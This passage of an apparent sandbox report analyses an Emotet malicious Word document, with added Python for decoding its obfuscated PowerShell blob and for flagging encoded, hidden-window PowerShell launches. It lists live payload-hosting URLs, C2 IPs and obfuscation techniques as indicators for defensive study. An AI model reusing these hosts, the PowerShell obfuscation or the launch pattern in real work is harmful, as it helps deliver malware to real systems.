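The -ENCOD argument on the process-creation line above is base64 over UTF-16LE text, and the decoded script assembles its .NET type names with PowerShell's -f format operator and string concatenation so that System.IO.Directory and System.Net.ServicePointManager never appear as literals. The Python below is an added example (it is not part of the Joe Sandbox report): it decodes the first 536 characters of the blob exactly as they appear in the line above, tolerates the truncation the report introduces, and collapses the two -f constructions and the ('V'+'ariABLe'+':FIU') concatenation back to plain strings. The function names are mine; the regular expressions cover only the flat forms present in this prefix, so the nested (...)+(...) URL assembly further into the script would need a proper expression walker.

```python
import base64
import re

# First 536 characters of the -ENCOD blob, copied from the report's
# cmd.exe -> powershell.exe process-creation line (the report truncates
# the remainder of the blob, so this is deliberately a prefix).
ENCODED_PREFIX = (
    "JAA5ADUAWABVAGMARAAgACAAPQAgACAAWwBUAFkAcABFAF0AKAAiAHsAMAB9AHsAMgB9AHsA"
    "NAB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBTAFkAUwBUAGUAJwAsACcAQwBUAE8AUgB5ACcA"
    "LAAnAE0AJwAsACcAUgBFACcALAAnAC4AaQBvAC4AZABJACcAKQAgACAAOwAgACAAcwBFAFQA"
    "LQBJAHQARQBtACAAIAAoACcAVgAnACsAJwBhAHIAaQBBAEIATABlACcAKwAnADoARgBJAFUA"
    "JwApACAAIAAoACAAIABbAHQAeQBwAEUAXQAoACIAewAxAH0AewA0AH0AewAwAH0AewA2AH0A"
    "ewA1AH0AewAzAH0AewAyAH0AIgAgAC0AZgAnAE0ALgBuAEUAVAAuAFMAZQBSACcALAAnAHMA"
    "WQBzAHQAJwAsACcAVABNAGEATgBBAEcAZQByACcALAAnAE4AJwAsACcARQAnACwAJwBJACcA"
    "LAAnAHYASQBjAEUAUABvACcAKQApADsA"
)


def decode_encoded_command(blob):
    """Decode a powershell.exe -EncodedCommand (-e / -enc / -ENCOD) argument.

    The argument is base64 over UTF-16LE. A blob cut short by a report or a
    log pipeline may end mid-quantum or mid-code-unit, so trim to a multiple
    of four base64 characters and drop a dangling odd byte instead of raising.
    """
    blob = re.sub(r"\s+", "", blob)
    blob = blob[: len(blob) - len(blob) % 4]
    raw = base64.b64decode(blob)
    if len(raw) % 2:
        raw = raw[:-1]
    return raw.decode("utf-16-le", errors="replace")


# ("{0}{2}{1}" -f 'a','b','c')   -> format-operator string assembly
_FORMAT_RE = re.compile(
    r'''\(\s*"((?:\{\d+\})+)"\s+-[fF]\s*((?:'[^']*'\s*,?\s*)+)\)'''
)
# ('a'+'b'+'c')                  -> flat single-quoted concatenation
_CONCAT_RE = re.compile(r"\(\s*(?:'[^']*'\s*\+\s*)+'[^']*'\s*\)")
_LITERAL_RE = re.compile(r"'([^']*)'")


def resolve_format_operator(script):
    """Return every "{i}{j}..." -f 'x','y',... construction as its plain string."""
    resolved = []
    for m in _FORMAT_RE.finditer(script):
        slots = [int(i) for i in re.findall(r"\{(\d+)\}", m.group(1))]
        args = _LITERAL_RE.findall(m.group(2))
        resolved.append("".join(args[i] for i in slots))
    return resolved


def resolve_concat(script):
    """Return every ('a'+'b'+...) construction as its plain string."""
    return ["".join(_LITERAL_RE.findall(m.group(0)))
            for m in _CONCAT_RE.finditer(script)]


if __name__ == "__main__":
    script = decode_encoded_command(ENCODED_PREFIX)
    print(script)
    for s in resolve_format_operator(script):
        print("-f   :", s, "->", s.lower())
    for s in resolve_concat(script):
        print("concat:", s)
```

Running it prints the decoded prefix followed by the two reconstructed type names (System.IO.Directory and System.Net.ServicePointManager, in the script's mixed case) and the variable name VariABLe:FIU; case-folding the results is enough to match them against a watch-list, since PowerShell type and member lookups are case-insensitive.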
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10004C5A cpuid
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10007D46 GetSystemTimeAsFileTime,GetCurrentThreadId,GetTickCount64,QueryPerformanceCounter,
                    Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Emotet
                    Source: Yara matchFile source: 0000000B.00000002.2347135822.0000000000231000.00000020.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.2102461185.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2100426425.0000000000190000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2100502394.0000000000241000.00000020.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.2102499691.00000000001E1000.00000020.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.2105453444.0000000000231000.00000020.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.2347096157.0000000000210000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.2103478043.0000000000170000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.2103529081.0000000000191000.00000020.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.2105397432.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 8.2.rundll32.exe.1e0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.rundll32.exe.210000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.rundll32.exe.170000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.rundll32.exe.190000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.rundll32.exe.230000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.rundll32.exe.170000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.rundll32.exe.210000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.rundll32.exe.230000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.rundll32.exe.240000.1.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

The report draws the complete ATT&CK grid (including the mobile-only Network Effects and Remote Service Effects columns); only cells carrying a superscript marker correspond to behaviour observed in this analysis. Those cells are listed here by tactic, with the report's superscript digits kept verbatim in brackets; the unmarked cells of the grid are omitted.

Tactic | Techniques flagged in this analysis
Initial Access | none
Execution | Windows Management Instrumentation [11], Scripting [32], Native API [1], Exploitation for Client Execution [3], Command and Scripting Interpreter [211], PowerShell [4]
Persistence | none
Privilege Escalation | Process Injection [111]
Defense Evasion | Disable or Modify Tools [1], Deobfuscate/Decode Files or Information [3], Scripting [32], Obfuscated Files or Information [1], Software Packing [1], Masquerading [21], Virtualization/Sandbox Evasion [2], Process Injection [111], Hidden Files and Directories [1], Rundll32 [1]
Credential Access | none
Discovery | System Time Discovery [1], File and Directory Discovery [3], System Information Discovery [26], Security Software Discovery [31], Virtualization/Sandbox Evasion [2], Process Discovery [2], Remote System Discovery [1]
Lateral Movement | none
Collection | Archive Collected Data [1]
Exfiltration | none
Command and Control | Ingress Tool Transfer [13], Encrypted Channel [2], Non-Application Layer Protocol [3], Application Layer Protocol [23]
Network Effects | none
Remote Service Effects | none
Impact | none

Behavior Graph

Behavior Graph ID: 336496
Sample: pack 2254794.doc
Start date: 06/01/2021
Architecture: WINDOWS
Score: 100

Signatures attached to the sample node: Multi AV Scanner detection for domain / URL; Antivirus detection for URL or domain; Multi AV Scanner detection for submitted file; 12 other signatures.

Process tree as drawn in the graph. Each child is started by the process above it; the numbers in parentheses are the counts the graph shows beside a process (its legend lists created registry values and created files).

pack 2254794.doc
  WINWORD.EXE (293, 21)
  cmd.exe
    signatures: Suspicious powershell command line found; Very long command line found; Encrypted powershell cmdline option found; PowerShell case anomaly found
    msg.exe
    powershell.exe (12, 9)
      network: petafilm.com, 176.53.69.151 port 80 (local port 49167), RADORETR, Turkey
      dropped: C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll (PE32)
      signature: Powershell drops PE file
      rundll32.exe
        rundll32.exe (15)
          signature: Hides that the sample has been downloaded from the Internet (zone.identifier)
          rundll32.exe (5)
            signature: Hides that the sample has been downloaded from the Internet (zone.identifier)
            rundll32.exe (5)
              signature: Hides that the sample has been downloaded from the Internet (zone.identifier)
              rundll32.exe (5)
                signature: Hides that the sample has been downloaded from the Internet (zone.identifier)
                rundll32.exe (13)
                  network: 5.2.136.90 port 80 (local port 49168), RCS-RDS73-75DrStaicoviciRO, Romania
                  signature: System process connects to network (likely due to code injection or exploit)
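The four signatures the graph attaches to cmd.exe (suspicious PowerShell command line, very long command line, encrypted command-line option, PowerShell case anomaly) are all visible in the launch string itself and can be checked on process-creation telemetry before any decoding. The Python below is an added example, not report code: it runs my own heuristics for those four conditions over constructed 4688-style records, the first of which mirrors the shape of this report's cmd.exe to powershell.exe launch. The 500-character length threshold and the list of "expected" casings are assumptions; the report does not state the sandbox's own thresholds.

```python
import re

# Constructed process-creation records (4688-style). Not taken from the
# report; the first mirrors the launch shape the behaviour graph flags
# (mixed-case binary name, -w hidden, abbreviated -ENCOD switch, very long
# command line), the other two are benign controls.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "POwersheLL -w hidden -ENCOD "
                + "JAA5ADUAWABVAGMARAAgACAAPQAgACAA" * 40},
    {"parent": r"C:\Windows\explorer.exe",
     "cmdline": r"powershell.exe -NoProfile -ExecutionPolicy Bypass "
                r"-File C:\scripts\inventory.ps1"},
    {"parent": r"C:\Windows\System32\services.exe",
     "cmdline": "svchost.exe -k netsvcs"},
]

POWERSHELL_NAMES = {"powershell", "powershell.exe", "pwsh", "pwsh.exe"}
# Casings a typed or scripted launch normally uses (assumed allow-list).
EXPECTED_CASINGS = {"powershell", "powershell.exe", "PowerShell", "PowerShell.exe",
                    "POWERSHELL", "POWERSHELL.EXE", "pwsh", "pwsh.exe"}
LONG_CMDLINE = 500  # assumed threshold, not the sandbox's


def _is_prefix_switch(token, parameter):
    """powershell.exe accepts any unambiguous prefix of a parameter name,
    which is why -e, -ec, -enc and -ENCOD all select -EncodedCommand."""
    if token[:1] not in "-/" or len(token) < 2:
        return False
    return parameter.startswith(token[1:].lower())


def powershell_indicators(cmdline, long_threshold=LONG_CMDLINE):
    """Return the indicator names raised by one command line, in order."""
    tokens = cmdline.split()
    if not tokens:
        return []
    # Tolerate a quoted full path; the image name is the last path element.
    name = tokens[0].strip('"').rsplit("\\", 1)[-1]
    if name.lower() not in POWERSHELL_NAMES:
        return []
    hits = []
    if name not in EXPECTED_CASINGS:
        hits.append("case_anomaly")
    for i, tok in enumerate(tokens[1:], start=1):
        if _is_prefix_switch(tok, "encodedcommand"):
            hits.append("encoded_command")
        if (_is_prefix_switch(tok, "windowstyle") and i + 1 < len(tokens)
                and tokens[i + 1].lower().startswith("hid")):
            hits.append("hidden_window")
    if len(cmdline) > long_threshold:
        hits.append("very_long_cmdline")
    return hits


def triage(events):
    """Return (parent image, indicators) for every event raising at least one."""
    flagged = []
    for ev in events:
        hits = powershell_indicators(ev["cmdline"])
        if hits:
            flagged.append((ev["parent"], hits))
    return flagged


if __name__ == "__main__":
    for parent, hits in triage(SAMPLE_EVENTS):
        print(parent, "->", ", ".join(hits))
```

Tokenising on whitespace is adequate for these shapes but will mis-handle switch values containing spaces; a production rule should take the image path from the event's own field rather than from the command line, and any hit on encoded_command is the natural trigger for the decoding step.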

Screenshots

[Screenshot thumbnails (windows-stand) are not reproduced in this text rendering.]

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
pack 2254794.doc | 30% | Virustotal |
pack 2254794.doc | 33% | ReversingLabs | Document-Excel.Trojan.Heuristic

Dropped Files

No Antivirus matches

Note that the dropped O_5Z.dll produced no antivirus match on disk; the detections below are on the unpacked payload images extracted from the rundll32.exe processes' memory, which is where a packed loader like this one becomes recognisable.

Unpacked PE Files

Source | Detection | Scanner | Label
8.2.rundll32.exe.1e0000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
11.2.rundll32.exe.230000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
9.2.rundll32.exe.190000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
10.2.rundll32.exe.230000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
7.2.rundll32.exe.240000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen

Domains

Source | Detection | Scanner | Label
petafilm.com | 6% | Virustotal |

URLs

Source | Detection | Scanner | Label
http://petafilm.com | 6% | Virustotal |
http://petafilm.com | 0% | Avira URL Cloud | safe
http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe (four identical entries)
http://zieflix.teleskopstore.com/cgi-bin/Gt3S/ | 5% | Virustotal |
http://zieflix.teleskopstore.com/cgi-bin/Gt3S/ | 0% | Avira URL Cloud | safe
http://5.2.136.90/76cxdz6xxj/u15u3hf6xq6us/0vtcgy/tltp48/51u1dif1fy5wlgpgf/ | 0% | Avira URL Cloud | safe
https://somanap.com/wp-admin/P/ | 0% | Avira URL Cloud | safe
https://fnjbq.com/wp-includes/rlR/ | 100% | Avira URL Cloud | malware
http://wap.zhonglisc.com/wp-includes/QryCB/ | 100% | Avira URL Cloud | malware
http://petafilm.com/wp-admin/4m/ | 100% | Avira URL Cloud | malware
http://www.%s.comPA | 0% | URL Reputation | safe (three identical entries)
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe (three identical entries)
https://sakhisuhaninarijeevika.com/wp-includes/CvGUjvE/ | 100% | Avira URL Cloud | malware
http://givingthanksdaily.com/qlE/VeF/ | 0% | Avira URL Cloud | safe

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
petafilm.com | 176.53.69.151 | true | true | | unknown

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://5.2.136.90/76cxdz6xxj/u15u3hf6xq6us/0vtcgy/tltp48/51u1dif1fy5wlgpgf/ | true | Avira URL Cloud: safe | unknown
http://petafilm.com/wp-admin/4m/ | true | Avira URL Cloud: malware | unknown

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check | rundll32.exe, 00000006.00000002.2108503830.0000000001D77000.00000002.00000001.sdmp; rundll32.exe, 00000007.00000002.2102634716.0000000002037000.00000002.00000001.sdmp | false | | high
http://www.windows.com/pctv. | rundll32.exe, 00000007.00000002.2101604260.0000000001E50000.00000002.00000001.sdmp | false | | high
http://investor.msn.com | rundll32.exe, 00000006.00000002.2107691837.0000000001B90000.00000002.00000001.sdmp; rundll32.exe, 00000007.00000002.2101604260.0000000001E50000.00000002.00000001.sdmp | false | | high
http://www.msnbc.com/news/ticker.txt | rundll32.exe, 00000006.00000002.2107691837.0000000001B90000.00000002.00000001.sdmp; rundll32.exe, 00000007.00000002.2101604260.0000000001E50000.00000002.00000001.sdmp | false | | high
http://petafilm.com | powershell.exe, 00000005.00000002.2106127906.0000000003B33000.00000004.00000001.sdmp | true | 6%, Virustotal; Avira URL Cloud: safe | unknown
http://www.icra.org/vocabulary/. | rundll32.exe, 00000006.00000002.2108503830.0000000001D77000.00000002.00000001.sdmp; rundll32.exe, 00000007.00000002.2102634716.0000000002037000.00000002.00000001.sdmp; rundll32.exe, 00000008.00000002.2105249606.0000000002037000.00000002.00000001.sdmp | false | URL Reputation: safe (four identical entries) | unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | powershell.exe, 00000005.00000002.2098095500.00000000024D0000.00000002.00000001.sdmp; rundll32.exe, 00000007.00000002.2105644253.00000000028E0000.00000002.00000001.sdmp; rundll32.exe, 00000008.00000002.2106881102.0000000002890000.00000002.00000001.sdmp | false | | high
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv | powershell.exe, 00000005.00000002.2096126054.00000000003C4000.00000004.00000020.sdmp | false | | high
http://zieflix.teleskopstore.com/cgi-bin/Gt3S/ | powershell.exe, 00000005.00000002.2105049912.0000000003803000.00000004.00000001.sdmp | true | 5%, Virustotal; Avira URL Cloud: safe | unknown
https://somanap.com/wp-admin/P/ | powershell.exe, 00000005.00000002.2105049912.0000000003803000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown
http://investor.msn.com/ | rundll32.exe, 00000006.00000002.2107691837.0000000001B90000.00000002.00000001.sdmp; rundll32.exe, 00000007.00000002.2101604260.0000000001E50000.00000002.00000001.sdmp | false | | high
https://fnjbq.com/wp-includes/rlR/ | powershell.exe, 00000005.00000002.2105049912.0000000003803000.00000004.00000001.sdmp | true | Avira URL Cloud: malware | unknown
http://wap.zhonglisc.com/wp-includes/QryCB/ | powershell.exe, 00000005.00000002.2105049912.0000000003803000.00000004.00000001.sdmp | true | Avira URL Cloud: malware | unknown
http://www.%s.comPA | powershell.exe, 00000005.00000002.2098095500.00000000024D0000.00000002.00000001.sdmp; rundll32.exe, 00000007.00000002.2105644253.00000000028E0000.00000002.00000001.sdmp; rundll32.exe, 00000008.00000002.2106881102.0000000002890000.00000002.00000001.sdmp | false | URL Reputation: safe (three identical entries) | low
http://www.piriform.com/cclea; | powershell.exe, 00000005.00000002.2096126054.00000000003C4000.00000004.00000020.sdmp | false | | high
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | rundll32.exe, 00000006.00000002.2108503830.0000000001D77000.00000002.00000001.sdmp; rundll32.exe, 00000007.00000002.2102634716.0000000002037000.00000002.00000001.sdmp; rundll32.exe, 00000008.00000002.2105249606.0000000002037000.00000002.00000001.sdmp | false | URL Reputation: safe (three identical entries) | unknown
http://www.hotmail.com/oe | rundll32.exe, 00000006.00000002.2107691837.0000000001B90000.00000002.00000001.sdmp; rundll32.exe, 00000007.00000002.2101604260.0000000001E50000.00000002.00000001.sdmp | false | | high
https://sakhisuhaninarijeevika.com/wp-includes/CvGUjvE/ | powershell.exe, 00000005.00000002.2105049912.0000000003803000.00000004.00000001.sdmp | true | Avira URL Cloud: malware | unknown
http://givingthanksdaily.com/qlE/VeF/ | powershell.exe, 00000005.00000002.2105049912.0000000003803000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown

The URLs marked malicious all come from the memory of the powershell.exe process (process 5) that downloaded O_5Z.dll; petafilm.com/wp-admin/4m/ is the one this run actually fetched from (see Contacted URLs). An "Avira URL Cloud: safe" verdict on the others reflects only that vendor's coverage at analysis time, not benign content, so all of them belong in the indicator set alongside the one that served the payload. The remaining entries (msn.com, windowsmedia.com, icra.org, piriform.com, schemas.xmlsoap.org) are strings that live in standard Windows and system libraries mapped into the processes and are not attributable to the sample.

Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
176.53.69.151 | unknown | Turkey | 42926 | RADORETR | true
5.2.136.90 | unknown | Romania | 8708 | RCS-RDS73-75DrStaicoviciRO | true

                                      General Information

                                      Joe Sandbox Version:31.0.0 Red Diamond
                                      Analysis ID:336496
                                      Start date:06.01.2021
                                      Start time:08:48:16
                                      Joe Sandbox Product:CloudBasic
                                      Overall analysis duration:0h 8m 55s
                                      Hypervisor based Inspection enabled:false
                                      Report type:light
                                      Sample file name:pack 2254794.doc
                                      Cookbook file name:defaultwindowsofficecookbook.jbs
                                      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed:13
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • HDC enabled
                                      • GSI enabled (VBA)
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Detection:MAL
                                      Classification:mal100.troj.expl.evad.winDOC@18/8@1/2
                                      EGA Information:Failed
                                      HDC Information:
                                      • Successful, ratio: 88% (good quality ratio 84.5%)
                                      • Quality average: 76.7%
                                      • Quality standard deviation: 26.2%
                                      HCA Information:
                                      • Successful, ratio: 88%
                                      • Number of executed functions: 0
                                      • Number of non-executed functions: 0
                                      Cookbook Comments:
                                      • Adjust boot time
                                      • Enable AMSI
                                      • Found application associated with file extension: .doc
                                      • Found Word or Excel or PowerPoint or XPS Viewer
                                      • Found warning dialog
                                      • Click Ok
                                      • Attach to Office via COM
                                      • Scroll down
                                      • Close Viewer
                                      Warnings:
                                      • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
                                      • TCP Packets have been reduced to 100
                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time | Type | Description
08:48:40 | API Interceptor | 1x Sleep call for process: msg.exe modified
08:48:41 | API Interceptor | 31x Sleep call for process: powershell.exe modified
08:48:46 | API Interceptor | 946x Sleep call for process: rundll32.exe modified

                                      Joe Sandbox View / Context

                                      IPs

                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                      176.53.69.151informazioni-0501-012021.docGet hashmaliciousBrowse
                                      • petafilm.com/wp-admin/4m/
                                      rapport 40329241.docGet hashmaliciousBrowse
                                      • petafilm.com/wp-admin/4m/
                                      Dati_012021_688_89301.docGet hashmaliciousBrowse
                                      • petafilm.com/wp-admin/4m/
                                      2199212_20210105_160680.docGet hashmaliciousBrowse
                                      • petafilm.com/wp-admin/4m/
                                      ARCHIVO_FILE.docGet hashmaliciousBrowse
                                      • petafilm.com/wp-admin/4m/
                                      doc_X_13536.docGet hashmaliciousBrowse
                                      • petafilm.com/wp-admin/4m/
                                      ytgeKMQNL2.docGet hashmaliciousBrowse
                                      • petafilm.com/wp-admin/4m/
                                      5.2.136.90DATA-480841.docGet hashmaliciousBrowse
                                      • 5.2.136.90/6tycsc/
                                      Documenten_9274874 8574977265.docGet hashmaliciousBrowse
                                      • 5.2.136.90/gv38bn75mnjox2y/c6b9ni4/vj3ut3/kld53/bp623/r5qw7a8y6jtlf9qu/
                                      pack-91089 416755919.docGet hashmaliciousBrowse
                                      • 5.2.136.90/9ormjijma/sd2xibclmrp5oftlrxf/
                                      Adjunto.docGet hashmaliciousBrowse
                                      • 5.2.136.90/nmjn7tw17/z6mjkdfb6xb/85tf0qh6u/bqo6i0tmr9bo/
                                      arc-NZY886292.docGet hashmaliciousBrowse
                                      • 5.2.136.90/zpm1364ks766bq5tfgm/of4c87wiptl9gmt2iai/xi3tkrikfkjmyw07j7s/8758g9rolh/96kjwl7hgnpltacdm2/gdi8d56ispt49sa36ql/
                                      NQN0244_012021.docGet hashmaliciousBrowse
                                      • 5.2.136.90/xgyqftp8/ypox5kzx24gfln5utkh/ejrffzc54r5vq/itkmc/prx4/
                                      4560 2021 UE_9893.docGet hashmaliciousBrowse
                                      • 5.2.136.90/tqndp5p5qacps4njp6/p6z0bktcdw7ja/i1rph/
                                      Scan-0767672.docGet hashmaliciousBrowse
                                      • 5.2.136.90/7hs0yieqcvglex40v9/th111ygicc1htiecx/eto0vvprampeftpmcc/
                                      Documento-2021.docGet hashmaliciousBrowse
                                      • 5.2.136.90/n5z35/rncfyghpt3nn9/twyyh8xn/dm5hb/
                                      informazioni-0501-012021.docGet hashmaliciousBrowse
                                      • 5.2.136.90/kcdo20u2bqptv6/
                                      rapport 40329241.docGet hashmaliciousBrowse
                                      • 5.2.136.90/6s0p53atjr9ihwygvd/svxo4o84aueyhj9v5m/5lqp30jb/g0ur1kwrzvgj3o0gmmo/dw8my2m1fzzo/
                                      info_39534.docGet hashmaliciousBrowse
                                      • 5.2.136.90/5ciqo/dhqbj3xw/
                                      Dati_012021_688_89301.docGet hashmaliciousBrowse
                                      • 5.2.136.90/l7tybna/g7nyjudv6/gf8bykzqxpzupj/wr2o0u8id88pf7dgmx3/9zupu1q7mb/wtjo6ov5niso7jo0n/
                                      2199212_20210105_160680.docGet hashmaliciousBrowse
                                      • 5.2.136.90/vcpu82n/rvhhoco3em4jtl/qxey084opeuhirghxzs/bm8x5w07go1ogzflbv/32imx8ryeb30/bd7tg46kn/
                                      ARCHIVO_FILE.docGet hashmaliciousBrowse
                                      • 5.2.136.90/ji02pdi/39rfb96opn/
                                      doc_X_13536.docGet hashmaliciousBrowse
                                      • 5.2.136.90/glhz448zi9act/ieva/q040/sl9198fns4q2/
                                      REP380501 040121.docGet hashmaliciousBrowse
                                      • 5.2.136.90/09hsu3aavqd4/8opns7c/oxp5fp7awb/
                                      doc-20210104-0184.docGet hashmaliciousBrowse
                                      • 5.2.136.90/78ro59myn48w9a6ku/bcgjwwwuc/
                                      7823099012021.docGet hashmaliciousBrowse
                                      • 5.2.136.90/bl7bvpp8itof0dvu5j2/nwcw9ztkp/yjrulniti57vcwwk67t/6u49kr6/

                                      Domains

                                      Match: petafilm.com
                                      Associated Sample Name / URL | Detection | Context
                                      informazioni-0501-012021.doc | malicious
                                      • 176.53.69.151
                                      rapport 40329241.doc | malicious
                                      • 176.53.69.151
                                      Dati_012021_688_89301.doc | malicious
                                      • 176.53.69.151
                                      2199212_20210105_160680.doc | malicious
                                      • 176.53.69.151
                                      ARCHIVO_FILE.doc | malicious
                                      • 176.53.69.151
                                      doc_X_13536.doc | malicious
                                      • 176.53.69.151
                                      ytgeKMQNL2.doc | malicious
                                      • 176.53.69.151

                                      ASN

                                      Match: RCS-RDS73-75DrStaicoviciRO
                                      Associated Sample Name / URL | Detection | Context
                                      DATA-480841.doc | malicious
                                      • 5.2.136.90
                                      Documenten_9274874 8574977265.doc | malicious
                                      • 5.2.136.90
                                      pack-91089 416755919.doc | malicious
                                      • 5.2.136.90
                                      Adjunto.doc | malicious
                                      • 5.2.136.90
                                      arc-NZY886292.doc | malicious
                                      • 5.2.136.90
                                      NQN0244_012021.doc | malicious
                                      • 5.2.136.90
                                      4560 2021 UE_9893.doc | malicious
                                      • 5.2.136.90
                                      Scan-0767672.doc | malicious
                                      • 5.2.136.90
                                      Documento-2021.doc | malicious
                                      • 5.2.136.90
                                      informazioni-0501-012021.doc | malicious
                                      • 5.2.136.90
                                      rapport 40329241.doc | malicious
                                      • 5.2.136.90
                                      info_39534.doc | malicious
                                      • 5.2.136.90
                                      Dati_012021_688_89301.doc | malicious
                                      • 5.2.136.90
                                      2199212_20210105_160680.doc | malicious
                                      • 5.2.136.90
                                      ARCHIVO_FILE.doc | malicious
                                      • 5.2.136.90
                                      doc_X_13536.doc | malicious
                                      • 5.2.136.90
                                      REP380501 040121.doc | malicious
                                      • 5.2.136.90
                                      doc-20210104-0184.doc | malicious
                                      • 5.2.136.90
                                      7823099012021.doc | malicious
                                      • 5.2.136.90
                                      vDKnVBINrY.exe | malicious
                                      • 86.120.144.206

                                      Match: RADORETR
                                      Associated Sample Name / URL | Detection | Context
                                      ST_Heodo_ST_2021-01-05_19-42-11-017.eml_20210105Rechnung.doc_analyze.doc | malicious
                                      • 185.225.36.38
                                      informazioni-0501-012021.doc | malicious
                                      • 176.53.69.151
                                      N.11389944 BS 05 gen 2021.doc | malicious
                                      • 185.225.36.38
                                      PSX7103491.doc | malicious
                                      • 185.225.36.38
                                      Beauftragung.doc | malicious
                                      • 185.225.36.38
                                      rapport 40329241.doc | malicious
                                      • 176.53.69.151
                                      Dati_012021_688_89301.doc | malicious
                                      • 176.53.69.151
                                      2199212_20210105_160680.doc | malicious
                                      • 176.53.69.151
                                      #U00e0#U00a4#U00ac#U00e0#U00a5#U20ac#U00e0#U00a4#U0153#U00e0#U00a4#U2022.doc | malicious
                                      • 185.225.36.38
                                      ARCHIVO_FILE.doc | malicious
                                      • 176.53.69.151
